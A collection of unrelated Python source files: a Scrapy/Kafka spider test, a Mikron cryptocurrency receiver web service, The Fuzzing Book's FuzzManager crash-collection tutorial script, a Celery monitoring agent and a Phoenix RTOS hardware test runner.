self.redis_conn.zadd(key, self.example_feed, -99)
# run the spider, give 20 seconds to see the url, crawl it,
# and send to kafka. Then we kill the reactor
def thread_func():
time.sleep(20)
reactor.stop()
thread = threading.Thread(target=thread_func)
thread.start()
reactor.run()
message_count = 0
m = next(self.consumer)
if m is None:
pass
else:
the_dict = json.loads(m.value)
if the_dict is not None and the_dict['appid'] == 'test' \
and the_dict['crawlid'] == 'abc12345':
message_count += 1
self.assertEquals(message_count, 1)
def tearDown(self):
keys = self.redis_conn.keys('stats:crawler:*:test-spider:*')
keys = keys + self.redis_conn.keys('test-spider:*')
for key in keys:
self.redis_conn.delete(key)
# if for some reason the tests fail, we end up falling behind on
# the consumer
for m in self.consumer:
pass
self.consumer.close()
if __name__ == '__main__':
unittest.main()
|
receiver_service.py
|
import config
import account_helper
import node_rpc_helper
import recv_db
import node_rpc_helper
import recv_setup
import os
import json
from bottle import post, request, response, get, route, static_file
from threading import Thread
import requests
import time
def setHeaders():
response.content_type = 'application/json'
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'PUT, GET, POST, DELETE, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
@route('/receiver/create_account', method='OPTIONS')
def createAccountOptions():
setHeaders()
return "OK"
# Example: curl -d "{'pool_account_id': 'ReceiverPool', 'pool_account_password': 'some_password'}" http://localhost:8090/receiver/create_account
@route('/receiver/create_account', method='POST')
def createAccountApi():
global config
setHeaders()
if config['receiver_service.enabled'] != 'true':
return {"error": "service not enabled"}
postdata = request.body.read().decode('utf8')
#print("postdata ", postdata)
postjson = json.loads(postdata.replace("'", '"'))
#print("postjson ", postjson)
if ("pool_account_id" not in postjson) or ("pool_account_password" not in postjson):
return {"error": "Missing pool account parameters"}
pool_account_id = postjson["pool_account_id"]
pool_account_password = postjson["pool_account_password"]
user_data = ''
if "user_data" in postjson:
user_data = postjson["user_data"]
res = createAccount(pool_account_id, pool_account_password, user_data)
recv_setup.setup_check_async()
return res
def createAccount(pool_account_id, pool_account_password, user_data):
global config
if (pool_account_id not in config["receiver_service.account"]) or (pool_account_password != config["receiver_service.account"][pool_account_id]["password"]):
return {"error": "source account not found or wrong password"}
src_walletid = config["receiver_service.account"][pool_account_id]["walletid"]
root_account = config["receiver_service.account"][pool_account_id]["account"]
#print("walletid ", src_walletid)
resp = node_rpc_helper.doCreateAccount(src_walletid)
if 'error' in resp:
return resp
if 'account' not in resp:
return {"error": "no account in response"}
account = resp['account']
account_idx = -1 # this is supposed to be the index of this account in the wallet, but we don't know it
try:
# OK, put it in DB
recv_db.add_new_rec_account(account, pool_account_id, user_data, root_account, account_idx, src_walletid)
except:
print("could not save to DB", account)
return {
"account": account
}
# Invoked by the node, RPC callback
@route('/rpccallback', method='POST')
def rpcCallback():
global config
postdata = request.body.read().decode('utf8')
#print("postdata ", postdata)
postjson = json.loads(postdata.replace("'", '"'))
#print("postjson ", postjson)
if 'account' not in postjson:
print("Error: no account in callback info")
return
account = postjson['account']
print("RPC callback", "account", account)
# find receiver account in DB
pool_account_id = ''
try:
db_acc = recv_db.get_account(account)
#print(len(db_acc))
if len(db_acc) >= 1:
#print(db_acc[0])
if 'pool_account_id' in db_acc[0]:
pool_account_id = db_acc[0]['pool_account_id']
except:
print('Error looking up in DB')
if (len(pool_account_id) <= 0) or (pool_account_id not in config['receiver_service.account']):
print('Could not match account to a configured receiver account!', account)
# DO NOT call into any webhooks... # invokeWebhookForPoolAccount('', account)
else:
# pool account is known
# check auto-forward
invokeWebhookForPoolAccount(pool_account_id, account)
handleAutoForward(account, pool_account_id, postjson)
return "ok"
# Call into the hook of a partner site, URL of the form 'https://mikron.io/webhook/{account}'
def invokeWebhookForPoolAccount(pool_account_id, account):
if (len(pool_account_id) <= 0) or (pool_account_id not in config['receiver_service.account']):
# no pool account, call into *all* webhooks anyways
for rec_account in config['receiver_service.account']:
if 'receiver_webhook' in config['receiver_service.account'][rec_account]:
webhook = config['receiver_service.account'][rec_account]['receiver_webhook']
#print(webhook)
invokeWebhook(webhook, account)
else:
if 'receiver_webhook' in config['receiver_service.account'][pool_account_id]:
webhook = config['receiver_service.account'][pool_account_id]['receiver_webhook']
#print(webhook)
invokeWebhook(webhook, account)
def invokeWebhook(webHookUrl, account):
url = webHookUrl.replace('{account}', account)
print("Invoking Web hook in background, url: ", url)
t = Thread(target=invokeInBg, args=(url,))
t.start()
def handleAutoForward(account, pool_account_id, postjson):
# check auto-forward
if pool_account_id in config['receiver_service.account']:
if 'auto_forward_to' in config['receiver_service.account'][pool_account_id]:
forward_acc = config['receiver_service.account'][pool_account_id]['auto_forward_to']
#print(forward_acc)
latest_balance = 0
if "block" in postjson:
block_json = json.loads(postjson["block"])
if "balance" in block_json:
latest_balance_str = block_json["balance"]
latest_balance = int(latest_balance_str)
#print("latest_balance", latest_balance)
if latest_balance > 0:
wallet_id = config['receiver_service.account'][pool_account_id]['walletid']
unique_id = str(time.time()) + account[:16]
latest_balance_mik = account_helper.fromRawToMikron(latest_balance)
#print("latest_balance_mik", latest_balance_mik)
node_rpc_helper.doSend(wallet_id, account, forward_acc, latest_balance_mik, unique_id)
print("Auto forwarded", latest_balance_mik, "to", forward_acc)
def invokeInBg(url):
response = requests.get(url)
print(response.url, response.text[:200])
@route('/receiver/get_status', method='GET')
def get_status():
setHeaders()
return {"status": recv_setup.get_setup_check_background()}
config = config.readConfig()
|
FuzzingInTheLarge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Fuzzing in the Large" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
# Last change: 2021-10-19 15:30:44+02:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Fuzzing in the Large
This file can be _executed_ as a script, running all experiments:
$ python FuzzingInTheLarge.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.FuzzingInTheLarge import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
The Python `FuzzManager` package allows for programmatic submission of failures from a large number of (fuzzed) programs. One can query crashes and their details, collect them into buckets to ensure thay will be treated the same, and also retrieve coverage information for debugging both programs and their tests.
For more details, source, and documentation, see
"The Fuzzing Book - Fuzzing in the Large"
at https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Fuzzing in the Large
# ====================
if __name__ == '__main__':
print('# Fuzzing in the Large')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Fuzzer
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Collecting Crashes from Multiple Fuzzers
## ----------------------------------------
if __name__ == '__main__':
print('\n## Collecting Crashes from Multiple Fuzzers')
from graphviz import Digraph
if __name__ == '__main__':
g = Digraph()
server = 'Crash Server'
g.node('Crash Database', shape='cylinder')
for i in range(1, 7):
g.edge('Fuzzer ' + repr(i), server)
g.edge(server, 'Crash Database')
g
## Running a Crash Server
## ----------------------
if __name__ == '__main__':
print('\n## Running a Crash Server')
### Excursion: Setting up the Server
if __name__ == '__main__':
print('\n### Excursion: Setting up the Server')
import os
import sys
import shutil
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
if os.path.exists('FuzzManager'):
shutil.rmtree('FuzzManager')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/MozillaSecurity/FuzzManager')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; git checkout 0.4.1')
if __name__ == '__main__':
import os
os.system(f'pip install -r FuzzManager/server/requirements.txt > /dev/null')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python server/manage.py migrate > /dev/null')
if __name__ == '__main__':
import os
os.system(f'(cd FuzzManager; echo "from django.contrib.auth import get_user_model; User = get_user_model(); User.objects.create_superuser(\'demo\', \'demo@fuzzingbook.org\', \'demo\')" | python server/manage.py shell)')
import subprocess
import sys
if __name__ == '__main__':
os.chdir('FuzzManager')
result = subprocess.run(['python',
'server/manage.py',
'get_auth_token',
'demo'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
os.chdir('..')
err = result.stderr.decode('ascii')
if len(err) > 0:
print(err, file=sys.stderr, end="")
if __name__ == '__main__':
token = result.stdout
token = token.decode('ascii').strip()
token
if __name__ == '__main__':
assert len(token) > 10, "Invalid token " + repr(token)
if __name__ == '__main__':
home = os.path.expanduser("~")
conf = os.path.join(home, ".fuzzmanagerconf")
if __name__ == '__main__':
fuzzmanagerconf = """
[Main]
sigdir = /home/example/fuzzingbook
serverhost = 127.0.0.1
serverport = 8000
serverproto = http
serverauthtoken = %s
tool = fuzzingbook
""" % token
if __name__ == '__main__':
with open(conf, "w") as file:
file.write(fuzzmanagerconf)
from pygments.lexers.configs import IniLexer
from .bookutils import print_file
if __name__ == '__main__':
print_file(conf, lexer=IniLexer())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting the Server
if __name__ == '__main__':
print('\n### Excursion: Starting the Server')
from multiprocess import Process
import subprocess
def run_fuzzmanager():
def run_fuzzmanager_forever():
os.chdir('FuzzManager')
proc = subprocess.Popen(['python', 'server/manage.py',
'runserver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
while True:
line = proc.stdout.readline()
print(line, end='')
fuzzmanager_process = Process(target=run_fuzzmanager_forever)
fuzzmanager_process.start()
return fuzzmanager_process
if __name__ == '__main__':
fuzzmanager_process = run_fuzzmanager()
import time
if __name__ == '__main__':
time.sleep(2)
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Logging In
if __name__ == '__main__':
print('\n### Logging In')
if __name__ == '__main__':
fuzzmanager_url = "http://127.0.0.1:8000"
if __name__ == '__main__':
from IPython.display import display, Image
from .bookutils import HTML, rich_output
from .GUIFuzzer import start_webdriver # minor dependency
if __name__ == '__main__':
gui_driver = start_webdriver(headless=True, zoom=1.2)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 600)
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
username = gui_driver.find_element_by_name("username")
username.send_keys("demo")
if __name__ == '__main__':
password = gui_driver.find_element_by_name("password")
password.send_keys("demo")
if __name__ == '__main__':
login = gui_driver.find_element_by_tag_name("button")
login.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Crashes
## ------------------
if __name__ == '__main__':
print('\n## Collecting Crashes')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy')
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make)')
from .bookutils import print_file
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.cpp")
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.fuzzmanagerconf", lexer=IniLexer())
if __name__ == '__main__':
import os
os.system(f'simply-buggy/simple-crash')
import subprocess
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
if __name__ == '__main__':
result = subprocess.run(cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Yay, we crashed!")
else:
print("Move along, nothing to see...")
### Program Configurations
if __name__ == '__main__':
print('\n### Program Configurations')
if __name__ == '__main__':
sys.path.append('FuzzManager')
if __name__ == '__main__':
from FTB.ProgramConfiguration import ProgramConfiguration
if __name__ == '__main__':
configuration = ProgramConfiguration.fromBinary('simply-buggy/simple-crash')
(configuration.product, configuration.platform)
### Crash Info
if __name__ == '__main__':
print('\n### Crash Info')
if __name__ == '__main__':
from FTB.Signatures.CrashInfo import CrashInfo
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
result = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if __name__ == '__main__':
stderr = result.stderr.decode().splitlines()
stderr[0:3]
if __name__ == '__main__':
stdout = result.stdout.decode().splitlines()
stdout
if __name__ == '__main__':
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
print(crashInfo)
### Collector
if __name__ == '__main__':
print('\n### Collector')
if __name__ == '__main__':
from Collector.Collector import Collector
if __name__ == '__main__':
collector = Collector()
if __name__ == '__main__':
collector.submit(crashInfo)
### Inspecting Crashes
if __name__ == '__main__':
print('\n### Inspecting Crashes')
if __name__ == '__main__':
gui_driver.refresh()
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
crash = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/crashmanager/crashes/")]')
crash.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Crash Buckets
## -------------
if __name__ == '__main__':
print('\n## Crash Buckets')
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
create = gui_driver.find_element_by_xpath('//a[contains(@href,"/signatures/new/")]')
create.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1200)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
save = gui_driver.find_element_by_name("submit_save")
save.click()
time.sleep(1)
### Crash Signatures
if __name__ == '__main__':
print('\n### Crash Signatures')
if __name__ == '__main__':
gui_driver.set_window_size(1400, 800)
Image(gui_driver.get_screenshot_as_png())
### Coarse-Grained Signatures
if __name__ == '__main__':
print('\n### Coarse-Grained Signatures')
if __name__ == '__main__':
print_file("simply-buggy/out-of-bounds.cpp")
import os
import random
import subprocess
import tempfile
import sys
#### Excursion: `escapelines()` implementatipn
if __name__ == '__main__':
print('\n#### Excursion: `escapelines()` implementatipn')
def isascii(s):
return all([0 <= ord(c) <= 127 for c in s])
if __name__ == '__main__':
isascii('Hello,')
def escapelines(bytes):
def ascii_chr(byte):
if 0 <= byte <= 127:
return chr(byte)
return r"\x%02x" % byte
def unicode_escape(line):
ret = "".join(map(ascii_chr, line))
assert isascii(ret)
return ret
return [unicode_escape(line) for line in bytes.splitlines()]
if __name__ == '__main__':
escapelines(b"Hello,\nworld!")
if __name__ == '__main__':
escapelines(b"abc\xffABC")
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
if __name__ == '__main__':
cmd = ["simply-buggy/out-of-bounds"]
# Connect to crash server
collector = Collector()
random.seed(2048)
crash_count = 0
TRIALS = 20
for itnum in range(0, TRIALS):
rand_len = random.randint(1, 1024)
rand_data = bytes([random.randrange(0, 256) for i in range(rand_len)])
(fd, current_file) = tempfile.mkstemp(prefix="fuzztest", text=True)
os.write(fd, rand_data)
os.close(fd)
current_cmd = []
current_cmd.extend(cmd)
current_cmd.append(current_file)
result = subprocess.run(current_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = [] # escapelines(result.stdout)
stderr = escapelines(result.stderr)
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
print(itnum, end=" ")
if crashed:
sys.stdout.write("(Crash) ")
# This reads the simple-crash.fuzzmanagerconf file
configuration = ProgramConfiguration.fromBinary(cmd[0])
# This reads and parses our ASan trace into a more generic format,
# returning us a generic "CrashInfo" object that we can inspect
# and/or submit to the server.
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
# Submit the crash
collector.submit(crashInfo, testCase = current_file)
crash_count += 1
os.remove(current_file)
print("")
print("Done, submitted %d crashes after %d runs." % (crash_count, TRIALS))
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/crashmanager/crashes")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Code Coverage
## ------------------------
if __name__ == '__main__':
print('\n## Collecting Code Coverage')
if __name__ == '__main__':
print_file("simply-buggy/maze.cpp")
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make clean && make coverage)')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy $HOME/simply-buggy-server ')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 server/manage.py setup_repository simply-buggy GITSourceCodeProvider $HOME/simply-buggy-server')
import random
import subprocess
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
constants = [3735928559, 1111638594]
TRIALS = 1000
for itnum in range(0, TRIALS):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0, 4):
if random.randint(0, 9) < 3:
current_cmd.append(str(constants[
random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr and "secret" in stderr[0]:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
if __name__ == '__main__':
import os
os.system(f'export PATH=$HOME/.cargo/bin:$PATH; grcov simply-buggy/ -t coveralls+ --commit-sha $(cd simply-buggy && git rev-parse HEAD) --token NONE -p `pwd`/simply-buggy/ > coverage.json')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 -mCovReporter --repository simply-buggy --description "Test1" --submit ../coverage.json')
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/covmanager")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
first_id = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/browse")]')
first_id.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
maze_cpp = gui_driver.find_element_by_xpath("//*[contains(text(), 'maze.cpp')]")
maze_cpp.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1400)
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
# Added the missing constant here
constants = [3735928559, 1111638594, 3405695742]
for itnum in range(0,1000):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0,4):
if random.randint(0, 9) < 3:
current_cmd.append(str(
constants[random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
fuzzmanager_process.terminate()
if __name__ == '__main__':
gui_driver.quit()
import shutil
if __name__ == '__main__':
for temp_file in ['coverage.json', 'geckodriver.log', 'ghostdriver.log']:
if os.path.exists(temp_file):
os.remove(temp_file)
if __name__ == '__main__':
home = os.path.expanduser("~")
for temp_dir in ['coverage', 'simply-buggy', 'simply-buggy-server',
os.path.join(home, 'simply-buggy-server'),
'FuzzManager']:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Automatic Crash Reporting
if __name__ == '__main__':
print('\n### Exercise 1: Automatic Crash Reporting')
|
agent.py
|
import gevent
from gevent import monkey
monkey.patch_all()
import json
from signal import signal, SIGTERM
from multiprocessing import Process
from leek.agent.logger import get_logger
from leek.agent.consumer import LeekConsumer
logger = get_logger(__name__)
class LeekAgent:
"""Main server object, which:
- Load subscriptions from config file.
- Orchestrates capturing of celery events.
- Fanout to API webhooks endpoints
"""
def __init__(self):
self.consumers = []
self.proc = []
self.subscriptions = self.load_subscriptions()
self.loop = None
if not len(self.subscriptions):
logger.warning("No subscriptions found, Consider adding subscriptions through environment variable or UI.")
return
logger.info("Building consumers...")
for subscription in self.subscriptions:
subscription_name = self.infer_subscription_name(subscription)
consumer = LeekConsumer(subscription_name, **subscription)
self.consumers.append(consumer)
logger.info("Consumers built...")
@staticmethod
def infer_subscription_name(subscription):
return f"{subscription.get('app_name')}-{subscription.get('app_env')}"
@staticmethod
def load_subscriptions():
logger.info(f"Loading subscriptions...")
# FROM JSON FILE
subscriptions_file = "/opt/app/conf/subscriptions.json"
with open(subscriptions_file) as json_file:
subscriptions = json.load(json_file)
logger.info(f"Found {len(subscriptions)} subscriptions!")
return subscriptions
def start(self):
if not len(self.consumers):
return
logger.info("Starting Leek Agent...")
signal(SIGTERM, self.stop)
for consumer in self.consumers:
p = Process(target=consumer.run)
p.start()
self.proc.append(p)
for p in self.proc:
p.join()
logger.info("Leek Agent stopped!")
def stop(self, _signal_received, _frame):
# Handle any cleanup here
print("SIGTERM detected. Exiting gracefully")
for p in self.proc:
p.kill()
if __name__ == '__main__':
LeekAgent().start()
|
device.py
|
import importlib
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import pexpect
import pexpect.fdpexpect
import serial
from pexpect.exceptions import TIMEOUT, EOF
from .config import PHRTOS_PROJECT_DIR, DEVICE_SERIAL
from .tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
QEMU_CMD = {
'ia32-generic': (
'qemu-system-i386',
[
'-hda', f'{PHRTOS_PROJECT_DIR}/_boot/phoenix-ia32-generic.disk',
'-nographic',
'-monitor', 'none'
]
)
}
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::psu\n')
while True:
line = self.proc.stdout.readline().decode('utf-8')
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
self.proc = subprocess.Popen(
['psu', f'{self.script}'],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
cwd=self.cwd
)
self.read_output()
self.proc.wait()
if self.proc.returncode != 0:
logging.error(f'Command {" ".join(self.proc.args)} with pid {self.proc.pid} failed!\n')
raise Exception('Flashing IMXRT106x failed')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
output = '::group::Pheonixd\n' + output + '::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
# Wait for an eoched command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
class Runner:
"""Common interface for test runners"""
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run test case using serial port"""
def __init__(self, port):
self.port = port
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.port, baudrate=115200)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
self.gpio.setup(self.pin, self.gpio.OUT)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
class IMXRT106xRunner(DeviceRunner):
"""This class provides interface to run test case on IMXRT106x using RaspberryPi.
GPIO 17 must be connected to the JTAG_nSRST (j21-15) (using an additional resistor 1,5k).
GPIO 4 must be connected to the SW7-3 (using a resistor 4,3k)."""
SDP = 'plo-ram-armv7m7-imxrt106x.sdp'
IMAGE = 'phoenix-armv7m7-imxrt106x.disk'
def __init__(
self,
port,
phoenixd_port='/dev/serial/by-id/usb-Phoenix_Systems_plo_CDC_ACM-if00'
):
super().__init__(port)
self.phoenixd_port = phoenixd_port
self.reset_gpio = GPIO(17)
self.reset_gpio.high()
self.boot_gpio = GPIO(4)
def reset(self):
self.reset_gpio.low()
time.sleep(0.050)
self.reset_gpio.high()
def boot(self, serial_downloader=False):
if serial_downloader:
self.boot_gpio.low()
else:
self.boot_gpio.high()
self.reset()
def flash(self):
self.boot(serial_downloader=True)
Psu(script=self.SDP).run()
phd = None
try:
with PloTalker(self.port) as plo:
plo.wait_prompt()
# FIXME We should wait for usb0 dev
time.sleep(1)
with Phoenixd(self.phoenixd_port) as phd:
plo.copy_file2mem(
src='usb0',
file=self.IMAGE,
dst='flash1',
off=0
)
